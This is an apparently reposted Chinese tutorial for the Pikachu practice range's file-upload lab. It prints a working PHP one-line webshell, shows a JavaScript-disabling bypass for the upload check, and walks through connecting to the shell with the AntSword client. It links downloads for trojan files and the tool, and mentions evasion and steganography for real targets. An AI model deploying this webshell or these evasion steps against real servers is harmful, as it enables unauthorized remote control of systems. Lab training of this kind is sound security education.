欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 幼教 > Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)

Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)

2025/9/23 12:33:30 来源:https://blog.csdn.net/2404_89737060/article/details/148539606  浏览:    关键词:Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)

在之前的皮卡丘靶场第九期Unsafe Fileupload篇中我们学习了木马的原理并且学了一个简单的木马文件

本期内容是为了更好的为大家解释木马(服务器方面的)的原理,连接,以及各种木马及连接工具的分享

文件木马:https://wwhc.lanzoue.com/iDYwL2ybhw4b

图片木马:https://wwhc.lanzoue.com/idhXN2ybhw2j

中国蚁剑:加载器:https://wwhc.lanzoue.com/iHq4B2yfi8yh

源码:https://wwhc.lanzoue.com/iT5ZI2yfhwzg

如果可以用github:https://github.com/AntSwordProject/

为了更好的演示,本期还是以之前Unsafe Fileupload篇制造的木马为例

同时再拓展一下木马的种类,我们用到的是一句话木马,短小精干,此外还有大马,可以干的事情更多,但是上传难度更大

打开加载器把中国蚁剑初始化,选择目录为源码的下载目录后即可使用(或者不下载源码,选择一个空目录,让加载器自己下载源码)

我们还是以皮卡丘靶场第九期Unsafe Fileupload篇的内容为例进行

<?php  @eval($_POST['shell']); ?>

根据之前我们知道的,client check中我们可以通过F12禁用JavaScript来将木马上传进去

由此我们知道了上传的文件到了哪里,我们接下来用蚁剑来连接

我这里的url为

http://172.30.160.107/pikachu/vul/unsafeupload/uploads/1.php

ipv4的地址可以通过cmd输入ipconfig来获取

根据各位的情况来修改即可

我们右键选择添加数据后,填入url和密码(密码就是上面的shell)

编码器酌情选择,默认的话就是明码数据,被发现的话一抓一个准,这里用默认的演示

可以看到成功了

在此说明一下,在靶场中我们可以通过查看前端文件来了解木马文件上传位置,在实际操作中我们不可能提前知道,所以要细心观察,通常获取位置的方式有抓包或者通过常用文件夹来试探比如常见的文件夹有/uploads/、/files/、/images/

上传方面经常会用到免杀,隐写等方式来避免被识别

进去以后可以看到出货了

完成

至此,Unsafe Fileupload篇-木马补充完成

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词